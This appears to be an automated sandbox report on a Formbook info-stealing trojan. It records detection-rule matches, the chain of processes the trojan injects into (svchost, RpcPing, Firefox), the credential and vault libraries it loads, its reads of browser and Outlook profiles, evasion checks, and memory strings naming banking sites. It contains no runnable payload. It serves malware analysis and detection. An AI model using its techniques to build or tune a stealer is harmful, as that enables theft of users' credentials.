Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BA2D5 GetLastError,FormatMessageW, 0_2_007BA2D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007A8713 AdjustTokenPrivileges,CloseHandle, 0_2_007A8713
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_007A8CC3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_007BB59E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_007CF121
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BC602 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_007BC602
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00754FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00754FE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe File created: C:\Users\user\AppData\Local\Temp\aut9784.tmp Jump to behavior
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RpcPing.exe, 00000009.00000003.2983637065.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2983493230.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.000000000310D000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.00000000030E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe" Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static file information: File size 1208832 > 1048576
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DUipWAeQLm.exe, 00000008.00000002.3338157469.00000000001EE000.00000002.00000001.01000000.00000005.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3337844651.00000000001EE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007CC304 LoadLibraryA,GetProcAddress, 0_2_007CC304
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0075C590 push eax; retn 0075h 0_2_0075C599
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00778B85 push ecx; ret 0_2_00778B98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004190A0 push esp; ret 2_2_004190B5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408926 push ebx; iretd 2_2_0040892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D99B pushad ; ret 2_2_0040D99C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EB96 push FFFFFF8Fh; retf 2_2_0041EB9A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411CAC pushfd ; retf 2_2_00411CB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411CBF push 3E557F42h; ret 2_2_00411CC4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403570 push eax; ret 2_2_00403572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004075A7 push 67C9EEB0h; retf 2_2_004075B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0225F pushad ; ret 2_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C027FA pushad ; ret 2_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx 2_2_03C309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0283D push eax; iretd 2_2_03C02858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C01368 push eax; iretd 2_2_03C01369
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C01065 push edi; ret 2_2_03C0108A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C018F3 push edx; iretd 2_2_03C01906
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034B225F pushad ; ret 9_2_034B27F9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034B27FA pushad ; ret 9_2_034B27F9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034E09AD push ecx; mov dword ptr [esp], ecx 9_2_034E09B6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034B283D push eax; iretd 9_2_034B2858
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034B135E push eax; iretd 9_2_034B1369
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C84034 push 67C9EEB0h; retf 9_2_02C8403E
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9C1B7 push ebx; ret 9_2_02C9C1C7
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C926B7 push ebp; ret 9_2_02C926C2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C92799 push edx; retf 9_2_02C9279A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8E74C push 3E557F42h; ret 9_2_02C8E751
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8E739 pushfd ; retf 9_2_02C8E745
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C853B3 push ebx; iretd 9_2_02C853B7
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8D360 push FFFFFFF6h; retf 9_2_02C8D36D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9B623 push FFFFFF8Fh; retf 9_2_02C9B627
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00754A35
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_007D55FD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007733C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe API/Special instruction interceptor: Address: 36C3234
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E rdtsc 2_2_03C7096E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\RpcPing.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 6684 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_007B4696
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BC93C FindFirstFileW,FindClose, 0_2_007BC93C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_007BC9C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_007BF200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_007BF35D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007BF65E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007B3A2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007B3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007BBF27
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9C400 FindFirstFileW,FindNextFileW,FindClose, 9_2_02C9C400
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9C536 FindFirstFileW,FindNextFileW,FindClose, 9_2_02C9C536
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00754AFE
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 45570IH2.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 45570IH2.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 45570IH2.9.dr Binary or memory string: discord.comVMware20,11696487552f
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PasswordVMware20
Source: 45570IH2.9.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,1169648
Source: 45570IH2.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 45570IH2.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /profileVMware20W
Source: 45570IH2.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 45570IH2.9.dr Binary or memory string: global block list test formVMware20,11696487552
